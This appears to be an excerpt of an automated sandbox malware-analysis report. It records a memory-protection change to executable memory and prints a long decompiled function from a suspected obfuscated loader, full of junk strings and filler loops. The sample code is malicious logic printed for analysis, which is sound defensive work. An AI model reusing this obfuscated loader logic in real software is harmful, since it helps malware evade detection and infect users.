                  control_flow_graph 304 1d733e1-1d733fc NtProtectVirtualMemory
                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01D73169,00000040,01D7132A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01D733FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00408444(signed int _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v48;
                  				short _v72;
                  				void* _v76;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				char _v92;
                  				long long _v116;
                  				signed int _v120;
                  				intOrPtr _v124;
                  				long long _v136;
                  				char _v140;
                  				short _v144;
                  				char _v164;
                  				short _v168;
                  				short _v180;
                  				void* _v184;
                  				void* _v192;
                  				long long _v800;
                  				long long _v808;
                  				void* _v812;
                  				intOrPtr _v820;
                  				char _v828;
                  				void* _v832;
                  				signed int _v836;
                  				char _v840;
                  				char _v848;
                  				signed int _v852;
                  				intOrPtr _v864;
                  				char _v872;
                  				char _v888;
                  				intOrPtr _v916;
                  				char _v924;
                  				char _v944;
                  				signed int _v948;
                  				char _v952;
                  				intOrPtr _v956;
                  				long long _v960;
                  				intOrPtr _v964;
                  				char _v968;
                  				signed int _v972;
                  				signed int _v976;
                  				signed int _v980;
                  				signed int _v984;
                  				signed int _v1320;
                  				signed int _v1324;
                  				signed int _v1328;
                  				signed int _v1332;
                  				signed int _v1336;
                  				signed int _v1364;
                  				intOrPtr* _v1368;
                  				signed int _v1372;
                  				signed int _v1376;
                  				intOrPtr* _v1380;
                  				signed int _v1384;
                  				signed int _v1388;
                  				intOrPtr* _v1392;
                  				signed int _v1396;
                  				signed int _v1400;
                  				intOrPtr* _v1404;
                  				signed int _v1408;
                  				signed int _v1412;
                  				intOrPtr* _v1416;
                  				signed int _v1420;
                  				intOrPtr* _v1424;
                  				signed int _v1428;
                  				signed int _v1432;
                  				intOrPtr* _v1436;
                  				signed int _v1440;
                  				signed int _v1444;
                  				intOrPtr* _v1448;
                  				signed int _v1452;
                  				signed int _v1456;
                  				signed int _v1460;
                  				signed int _v1464;
                  				signed int _v1468;
                  				signed int _v1472;
                  				intOrPtr* _v1476;
                  				signed int _v1480;
                  				signed int _v1484;
                  				intOrPtr* _v1488;
                  				signed int _v1492;
                  				signed int _v1496;
                  				signed int _v1500;
                  				intOrPtr* _v1504;
                  				signed int _v1508;
                  				signed int _v1512;
                  				intOrPtr* _v1516;
                  				signed int _v1520;
                  				signed int _v1524;
                  				char* _t588;
                  				signed int _t592;
                  				signed int _t597;
                  				signed int _t611;
                  				signed int _t617;
                  				signed int _t622;
                  				signed int _t627;
                  				signed int _t631;
                  				signed int _t635;
                  				char* _t640;
                  				signed int _t644;
                  				signed int _t651;
                  				signed int _t655;
                  				signed int _t657;
                  				signed int _t664;
                  				signed int _t670;
                  				signed int _t674;
                  				signed int _t678;
                  				signed int _t684;
                  				signed int _t688;
                  				signed int _t692;
                  				signed int _t698;
                  				char* _t703;
                  				signed int _t710;
                  				signed int _t715;
                  				signed int _t722;
                  				signed int _t727;
                  				signed int _t734;
                  				signed int _t739;
                  				signed int _t745;
                  				signed int _t750;
                  				char* _t754;
                  				signed int _t762;
                  				signed int _t767;
                  				signed int _t774;
                  				signed int _t779;
                  				signed int _t786;
                  				signed int _t792;
                  				char* _t796;
                  				signed int _t799;
                  				void* _t800;
                  				void* _t857;
                  				void* _t861;
                  				intOrPtr _t866;
                  				long long _t919;
                  
                  				 *[fs:0x0] = _t866;
                  				L004011F0();
                  				_v16 = _t866;
                  				_v12 = 0x401180;
                  				_v8 = _a4 & 0x00000001;
                  				_a4 = _a4 & 0xfffffffe;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, _t857, _t861, _t800,  *[fs:0x0], 0x4011f6);
                  				_push(3);
                  				_push(0x4031f4);
                  				_t588 =  &_v48;
                  				_push(_t588);
                  				L004013D0();
                  				_push(0x402fe0);
                  				_push(0x402fe0);
                  				L004013BE();
                  				_v864 = _t588;
                  				_v872 = 8;
                  				_push(1);
                  				_push( &_v872);
                  				_push( &_v888);
                  				L004013C4();
                  				_v916 = 0x402fe0;
                  				_v924 = 0x8008;
                  				_push( &_v888);
                  				_t592 =  &_v924;
                  				_push(_t592);
                  				L004013CA();
                  				_v972 = _t592;
                  				_push( &_v888);
                  				_push( &_v872);
                  				_push(2);
                  				L004013B8();
                  				if(_v972 != 0) {
                  					_v864 = 2;
                  					_v872 = 2;
                  					L004013AC();
                  					L004013B2();
                  					L004013A6();
                  					_v864 = 1;
                  					_v872 = 2;
                  					_t796 =  &_v872;
                  					L004013A0();
                  					L004013B2();
                  					L004013A6();
                  					_t919 =  *0x401178;
                  					L0040139A();
                  					_t799 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t796, _t796, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe,  &_v872);
                  					asm("fclex");
                  					_v972 = _t799;
                  					if(_v972 >= 0) {
                  						_v1364 = _v1364 & 0x00000000;
                  					} else {
                  						_push(0x64);
                  						_push(0x402ae0);
                  						_push(_a4);
                  						_push(_v972);
                  						L00401394();
                  						_v1364 = _t799;
                  					}
                  				}
                  				_v864 = 2;
                  				_v872 = 2;
                  				_push( &_v872);
                  				L004013AC();
                  				L004013B2();
                  				L004013A6();
                  				_t597 =  &_v828;
                  				_push(_t597);
                  				E00402D94();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x58) {
                  					if( *0x4123c0 != 0) {
                  						_v1368 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1368 = 0x4123c0;
                  					}
                  					_v972 =  *_v1368;
                  					_t762 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t762;
                  					if(_v976 >= 0) {
                  						_v1372 = _v1372 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1372 = _t762;
                  					}
                  					_v980 = _v848;
                  					_t767 =  *((intOrPtr*)( *_v980 + 0xc0))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t767;
                  					if(_v984 >= 0) {
                  						_v1376 = _v1376 & 0x00000000;
                  					} else {
                  						_push(0xc0);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1376 = _t767;
                  					}
                  					_v168 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1380 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1380 = 0x4123c0;
                  					}
                  					_v972 =  *_v1380;
                  					_t774 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t774;
                  					if(_v976 >= 0) {
                  						_v1384 = _v1384 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1384 = _t774;
                  					}
                  					_v980 = _v848;
                  					_t779 =  *((intOrPtr*)( *_v980 + 0xf8))(_v980,  &_v836);
                  					asm("fclex");
                  					_v984 = _t779;
                  					if(_v984 >= 0) {
                  						_v1388 = _v1388 & 0x00000000;
                  					} else {
                  						_push(0xf8);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1388 = _t779;
                  					}
                  					_v1320 = _v836;
                  					_v836 = _v836 & 0x00000000;
                  					L004013B2();
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1392 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1392 = 0x4123c0;
                  					}
                  					_v972 =  *_v1392;
                  					_t786 =  *((intOrPtr*)( *_v972 + 0x1c))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t786;
                  					if(_v976 >= 0) {
                  						_v1396 = _v1396 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1396 = _t786;
                  					}
                  					_v980 = _v848;
                  					_v916 = 0x80020004;
                  					_v924 = 0xa;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t792 =  *((intOrPtr*)( *_v980 + 0x54))(_v980, 0x10,  &_v852);
                  					asm("fclex");
                  					_v984 = _t792;
                  					if(_v984 >= 0) {
                  						_v1400 = _v1400 & 0x00000000;
                  					} else {
                  						_push(0x54);
                  						_push(0x403024);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1400 = _t792;
                  					}
                  					_v1324 = _v852;
                  					_v852 = _v852 & 0x00000000;
                  					_v864 = _v1324;
                  					_v872 = 9;
                  					_t597 = 0x10;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0);
                  					_push(_v820);
                  					L0040137C();
                  					L00401382();
                  					L004013A6();
                  				}
                  				_push(0x8966da);
                  				E00402EBC();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x1e61) {
                  					if( *0x4123c0 != 0) {
                  						_v1404 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1404 = 0x4123c0;
                  					}
                  					_v972 =  *_v1404;
                  					_t745 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t745;
                  					if(_v976 >= 0) {
                  						_v1408 = _v1408 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1408 = _t745;
                  					}
                  					_v980 = _v848;
                  					_t750 =  *((intOrPtr*)( *_v980 + 0x110))(_v980,  &_v836);
                  					asm("fclex");
                  					_v984 = _t750;
                  					if(_v984 >= 0) {
                  						_v1412 = _v1412 & 0x00000000;
                  					} else {
                  						_push(0x110);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1412 = _t750;
                  					}
                  					_v1328 = _v836;
                  					_v836 = _v836 & 0x00000000;
                  					L004013B2();
                  					L00401382();
                  					L00401376();
                  					_v124 = _t919;
                  					if( *0x4123c0 != 0) {
                  						_v1416 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1416 = 0x4123c0;
                  					}
                  					_v972 =  *_v1416;
                  					_t754 =  &_v848;
                  					L00401370();
                  					_t597 =  *((intOrPtr*)( *_v972 + 0x10))(_v972, _t754, _t754, _a4);
                  					asm("fclex");
                  					_v976 = _t597;
                  					if(_v976 >= 0) {
                  						_v1420 = _v1420 & 0x00000000;
                  					} else {
                  						_push(0x10);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1420 = _t597;
                  					}
                  					L00401382();
                  				}
                  				_push(0x4c5969);
                  				E00402EFC();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x1e60) {
                  					if( *0x4123c0 != 0) {
                  						_v1424 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1424 = 0x4123c0;
                  					}
                  					_v972 =  *_v1424;
                  					_t710 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t710;
                  					if(_v976 >= 0) {
                  						_v1428 = _v1428 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1428 = _t710;
                  					}
                  					_v980 = _v848;
                  					_t715 =  *((intOrPtr*)( *_v980 + 0x108))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t715;
                  					if(_v984 >= 0) {
                  						_v1432 = _v1432 & 0x00000000;
                  					} else {
                  						_push(0x108);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1432 = _t715;
                  					}
                  					_v72 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1436 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1436 = 0x4123c0;
                  					}
                  					_v972 =  *_v1436;
                  					_t722 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t722;
                  					if(_v976 >= 0) {
                  						_v1440 = _v1440 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1440 = _t722;
                  					}
                  					_v980 = _v848;
                  					_t727 =  *((intOrPtr*)( *_v980 + 0xc8))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t727;
                  					if(_v984 >= 0) {
                  						_v1444 = _v1444 & 0x00000000;
                  					} else {
                  						_push(0xc8);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1444 = _t727;
                  					}
                  					_v144 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1448 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1448 = 0x4123c0;
                  					}
                  					_v972 =  *_v1448;
                  					_t734 =  *((intOrPtr*)( *_v972 + 0x1c))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t734;
                  					if(_v976 >= 0) {
                  						_v1452 = _v1452 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1452 = _t734;
                  					}
                  					_v980 = _v848;
                  					_v916 = 0x80020004;
                  					_v924 = 0xa;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t739 =  *((intOrPtr*)( *_v980 + 0x60))(_v980, L"Receptionsassistenter4", 0x10);
                  					asm("fclex");
                  					_v984 = _t739;
                  					if(_v984 >= 0) {
                  						_v1456 = _v1456 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x403024);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1456 = _t739;
                  					}
                  					L00401382();
                  				}
                  				_v968 = 0x8b685910;
                  				_v964 = 0x5afc;
                  				_v960 = 0xe92196e0;
                  				_v956 = 0x5af5;
                  				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Enervous", 0x69ca,  &_v960,  &_v968,  &_v944);
                  				_v180 = _v944;
                  				_v968 = 0x4e4866f0;
                  				_v964 = 0x5b02;
                  				_v960 =  *0x401170;
                  				_v948 = 0x1d68ea;
                  				_t611 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, L"Holmberry5",  &_v960,  &_v968,  &_v952);
                  				_v972 = _t611;
                  				if(_v972 >= 0) {
                  					_v1460 = _v1460 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1460 = _t611;
                  				}
                  				_v140 = _v952;
                  				_v944 = 0x5fc6;
                  				_t617 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, L"disuniter",  &_v944,  &_v948);
                  				_v972 = _t617;
                  				if(_v972 >= 0) {
                  					_v1464 = _v1464 & 0x00000000;
                  				} else {
                  					_push(0x6f8);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1464 = _t617;
                  				}
                  				_v120 = _v948;
                  				L0040136A();
                  				_t622 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v836, 0xe1,  &_v960);
                  				_v972 = _t622;
                  				if(_v972 >= 0) {
                  					_v1468 = _v1468 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1468 = _t622;
                  				}
                  				_v136 = _v960;
                  				L00401364();
                  				L0040136A();
                  				_t627 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v836, 0x5188,  &_v960);
                  				_v972 = _t627;
                  				if(_v972 >= 0) {
                  					_v1472 = _v1472 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1472 = _t627;
                  				}
                  				_v808 = _v960;
                  				L00401364();
                  				if( *0x412010 != 0) {
                  					_v1476 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1476 = 0x412010;
                  				}
                  				_t631 =  &_v848;
                  				L00401358();
                  				_v972 = _t631;
                  				_t635 =  *((intOrPtr*)( *_v972 + 0x1b8))(_v972,  &_v852, _t631,  *((intOrPtr*)( *((intOrPtr*)( *_v1476)) + 0x304))( *_v1476));
                  				asm("fclex");
                  				_v976 = _t635;
                  				if(_v976 >= 0) {
                  					_v1480 = _v1480 & 0x00000000;
                  				} else {
                  					_push(0x1b8);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1480 = _t635;
                  				}
                  				L0040135E();
                  				_v968 = 0x5f6bf5a0;
                  				_v964 = 0x5af8;
                  				_v960 =  *0x401168;
                  				_v948 = 0x841700;
                  				_t640 =  &_v872;
                  				L00401352();
                  				L004013B2();
                  				_t644 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, _t640, _t640,  &_v960,  &_v968,  &_v952,  &_v872, _v852, 0, 0);
                  				_v980 = _t644;
                  				if(_v980 >= 0) {
                  					_v1484 = _v1484 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1484 = _t644;
                  				}
                  				_v92 = _v952;
                  				L00401364();
                  				_push( &_v852);
                  				_push( &_v848);
                  				_push(2);
                  				L0040134C();
                  				L004013A6();
                  				if( *0x412010 != 0) {
                  					_v1488 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1488 = 0x412010;
                  				}
                  				_t651 =  &_v848;
                  				L00401358();
                  				_v972 = _t651;
                  				_t655 =  *((intOrPtr*)( *_v972 + 0x100))(_v972,  &_v852, _t651,  *((intOrPtr*)( *((intOrPtr*)( *_v1488)) + 0x300))( *_v1488));
                  				asm("fclex");
                  				_v976 = _t655;
                  				if(_v976 >= 0) {
                  					_v1492 = _v1492 & 0x00000000;
                  				} else {
                  					_push(0x100);
                  					_push(0x4030ec);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1492 = _t655;
                  				}
                  				L0040135E();
                  				_v968 = 0xef1aa800;
                  				_v964 = 0x5afc;
                  				_v960 =  *0x401160;
                  				_t657 =  &_v872;
                  				L00401346();
                  				_v948 = _t657;
                  				_t664 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, L"SLAVESJLENE",  &_v960,  &_v968,  &_v952, _t657,  &_v872, _v852, 0, 0);
                  				_v980 = _t664;
                  				if(_v980 >= 0) {
                  					_v1496 = _v1496 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1496 = _t664;
                  				}
                  				_v88 = _v952;
                  				L0040134C();
                  				L004013A6();
                  				_t670 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v848,  &_v852);
                  				asm("fclex");
                  				_v972 = _t670;
                  				if(_v972 >= 0) {
                  					_v1500 = _v1500 & 0x00000000;
                  				} else {
                  					_push(0x2b4);
                  					_push(0x402ae0);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1500 = _t670;
                  				}
                  				L112:
                  				L112:
                  				if( *0x412010 != 0) {
                  					_v1504 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1504 = 0x412010;
                  				}
                  				_t674 =  &_v848;
                  				L00401358();
                  				_v972 = _t674;
                  				_t678 =  *((intOrPtr*)( *_v972 + 0x150))(_v972,  &_v836, _t674,  *((intOrPtr*)( *((intOrPtr*)( *_v1504)) + 0x308))( *_v1504));
                  				asm("fclex");
                  				_v976 = _t678;
                  				if(_v976 >= 0) {
                  					_v1508 = _v1508 & 0x00000000;
                  				} else {
                  					_push(0x150);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1508 = _t678;
                  				}
                  				_v1332 = _v836;
                  				_v836 = _v836 & 0x00000000;
                  				L004013B2();
                  				_t684 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v840, 0x55c3,  &_v960);
                  				_v980 = _t684;
                  				if(_v980 >= 0) {
                  					_v1512 = _v1512 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1512 = _t684;
                  				}
                  				_v800 = _v960;
                  				L00401364();
                  				L00401382();
                  				if( *0x412010 != 0) {
                  					_v1516 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1516 = 0x412010;
                  				}
                  				_t688 =  &_v848;
                  				L00401358();
                  				_v972 = _t688;
                  				_t692 =  *((intOrPtr*)( *_v972 + 0x150))(_v972,  &_v836, _t688,  *((intOrPtr*)( *((intOrPtr*)( *_v1516)) + 0x304))( *_v1516));
                  				asm("fclex");
                  				_v976 = _t692;
                  				if(_v976 >= 0) {
                  					_v1520 = _v1520 & 0x00000000;
                  				} else {
                  					_push(0x150);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1520 = _t692;
                  				}
                  				_v1336 = _v836;
                  				_v836 = _v836 & 0x00000000;
                  				L004013B2();
                  				_t698 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v840, 0x5e86,  &_v960);
                  				_v980 = _t698;
                  				if(_v980 >= 0) {
                  					_v1524 = _v1524 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1524 = _t698;
                  				}
                  				_v116 = _v960;
                  				L00401364();
                  				L00401382();
                  				_v916 = 1;
                  				_v924 = 2;
                  				_push( &_v164);
                  				_push( &_v924);
                  				_push( &_v872);
                  				L0040133A();
                  				L00401340();
                  				_v916 = 0x1ffff;
                  				_v924 = 0x8003;
                  				_push( &_v164);
                  				_t703 =  &_v924;
                  				_push(_t703);
                  				L00401334();
                  				if(_t703 == 0) {
                  					goto L132;
                  				}
                  				goto L112;
                  				L132:
                  				_v84 = 0;
                  				_push(0x407269);
                  				goto ( *__edx);
                  			}












































































































































                  0x00408456
                  0x00408462
                  0x0040846a
                  0x0040846d
                  0x0040847a
                  0x00408483
                  0x0040848e
                  0x00408491
                  0x00408493
                  0x00408498
                  0x0040849b
                  0x0040849c
                  0x004084a1
                  0x004084a6
                  0x004084ab
                  0x004084b0
                  0x004084b6
                  0x004084c0
                  0x004084c8
                  0x004084cf
                  0x004084d0
                  0x004084d5
                  0x004084df
                  0x004084ef
                  0x004084f0
                  0x004084f6
                  0x004084f7
                  0x004084fc
                  0x00408509
                  0x00408510
                  0x00408511
                  0x00408513
                  0x00408524
                  0x0040852a
                  0x00408534
                  0x00408545
                  0x00408552
                  0x0040855d
                  0x00408562
                  0x0040856c
                  0x0040857e
                  0x00408585
                  0x0040858f
                  0x0040859a
                  0x0040859f
                  0x004085a5
                  0x004085b3
                  0x004085b6
                  0x004085b8
                  0x004085c5
                  0x004085e4
                  0x004085c7
                  0x004085c7
                  0x004085c9
                  0x004085ce
                  0x004085d1
                  0x004085d7
                  0x004085dc
                  0x004085dc
                  0x004085c5
                  0x004085eb
                  0x004085f5
                  0x00408605
                  0x00408606
                  0x00408613
                  0x0040861e
                  0x00408623
                  0x00408629
                  0x0040862a
                  0x0040862f
                  0x00408635
                  0x00408641
                  0x0040864e
                  0x0040866b
                  0x00408650
                  0x00408650
                  0x00408655
                  0x0040865a
                  0x0040865f
                  0x0040865f
                  0x0040867d
                  0x00408698
                  0x0040869b
                  0x0040869d
                  0x004086aa
                  0x004086cc
                  0x004086ac
                  0x004086ac
                  0x004086ae
                  0x004086b3
                  0x004086b9
                  0x004086bf
                  0x004086c4
                  0x004086c4
                  0x004086d9
                  0x004086f4
                  0x004086fa
                  0x004086fc
                  0x00408709
                  0x0040872e
                  0x0040870b
                  0x0040870b
                  0x00408710
                  0x00408715
                  0x0040871b
                  0x00408721
                  0x00408726
                  0x00408726
                  0x0040873c
                  0x00408749
                  0x00408755
                  0x00408772
                  0x00408757
                  0x00408757
                  0x0040875c
                  0x00408761
                  0x00408766
                  0x00408766
                  0x00408784
                  0x0040879f
                  0x004087a2
                  0x004087a4
                  0x004087b1
                  0x004087d3
                  0x004087b3
                  0x004087b3
                  0x004087b5
                  0x004087ba
                  0x004087c0
                  0x004087c6
                  0x004087cb
                  0x004087cb
                  0x004087e0
                  0x004087fb
                  0x00408801
                  0x00408803
                  0x00408810
                  0x00408835
                  0x00408812
                  0x00408812
                  0x00408817
                  0x0040881c
                  0x00408822
                  0x00408828
                  0x0040882d
                  0x0040882d
                  0x00408842
                  0x00408848
                  0x0040885b
                  0x00408866
                  0x00408872
                  0x0040888f
                  0x00408874
                  0x00408874
                  0x00408879
                  0x0040887e
                  0x00408883
                  0x00408883
                  0x004088a1
                  0x004088bc
                  0x004088bf
                  0x004088c1
                  0x004088ce
                  0x004088f0
                  0x004088d0
                  0x004088d0
                  0x004088d2
                  0x004088d7
                  0x004088dd
                  0x004088e3
                  0x004088e8
                  0x004088e8
                  0x004088fd
                  0x00408903
                  0x0040890d
                  0x00408921
                  0x0040892e
                  0x0040892f
                  0x00408930
                  0x00408931
                  0x00408940
                  0x00408943
                  0x00408945
                  0x00408952
                  0x00408974
                  0x00408954
                  0x00408954
                  0x00408956
                  0x0040895b
                  0x00408961
                  0x00408967
                  0x0040896c
                  0x0040896c
                  0x00408981
                  0x00408987
                  0x00408994
                  0x0040899a
                  0x004089a6
                  0x004089a7
                  0x004089b4
                  0x004089b5
                  0x004089b6
                  0x004089b7
                  0x004089b8
                  0x004089ba
                  0x004089c0
                  0x004089cb
                  0x004089d6
                  0x004089d6
                  0x004089db
                  0x004089e0
                  0x004089e5
                  0x004089eb
                  0x004089fa
                  0x00408a07
                  0x00408a24
                  0x00408a09
                  0x00408a09
                  0x00408a0e
                  0x00408a13
                  0x00408a18
                  0x00408a18
                  0x00408a36
                  0x00408a51
                  0x00408a54
                  0x00408a56
                  0x00408a63
                  0x00408a85
                  0x00408a65
                  0x00408a65
                  0x00408a67
                  0x00408a6c
                  0x00408a72
                  0x00408a78
                  0x00408a7d
                  0x00408a7d
                  0x00408a92
                  0x00408aad
                  0x00408ab3
                  0x00408ab5
                  0x00408ac2
                  0x00408ae7
                  0x00408ac4
                  0x00408ac4
                  0x00408ac9
                  0x00408ace
                  0x00408ad4
                  0x00408ada
                  0x00408adf
                  0x00408adf
                  0x00408af4
                  0x00408afa
                  0x00408b0d
                  0x00408b18
                  0x00408b1d
                  0x00408b22
                  0x00408b2c
                  0x00408b49
                  0x00408b2e
                  0x00408b2e
                  0x00408b33
                  0x00408b38
                  0x00408b3d
                  0x00408b3d
                  0x00408b5b
                  0x00408b64
                  0x00408b6b
                  0x00408b7f
                  0x00408b82
                  0x00408b84
                  0x00408b91
                  0x00408bb3
                  0x00408b93
                  0x00408b93
                  0x00408b95
                  0x00408b9a
                  0x00408ba0
                  0x00408ba6
                  0x00408bab
                  0x00408bab
                  0x00408bc0
                  0x00408bc0
                  0x00408bc5
                  0x00408bca
                  0x00408bcf
                  0x00408bd5
                  0x00408be4
                  0x00408bf1
                  0x00408c0e
                  0x00408bf3
                  0x00408bf3
                  0x00408bf8
                  0x00408bfd
                  0x00408c02
                  0x00408c02
                  0x00408c20
                  0x00408c3b
                  0x00408c3e
                  0x00408c40
                  0x00408c4d
                  0x00408c6f
                  0x00408c4f
                  0x00408c4f
                  0x00408c51
                  0x00408c56
                  0x00408c5c
                  0x00408c62
                  0x00408c67
                  0x00408c67
                  0x00408c7c
                  0x00408c97
                  0x00408c9d
                  0x00408c9f
                  0x00408cac
                  0x00408cd1
                  0x00408cae
                  0x00408cae
                  0x00408cb3
                  0x00408cb8
                  0x00408cbe
                  0x00408cc4
                  0x00408cc9
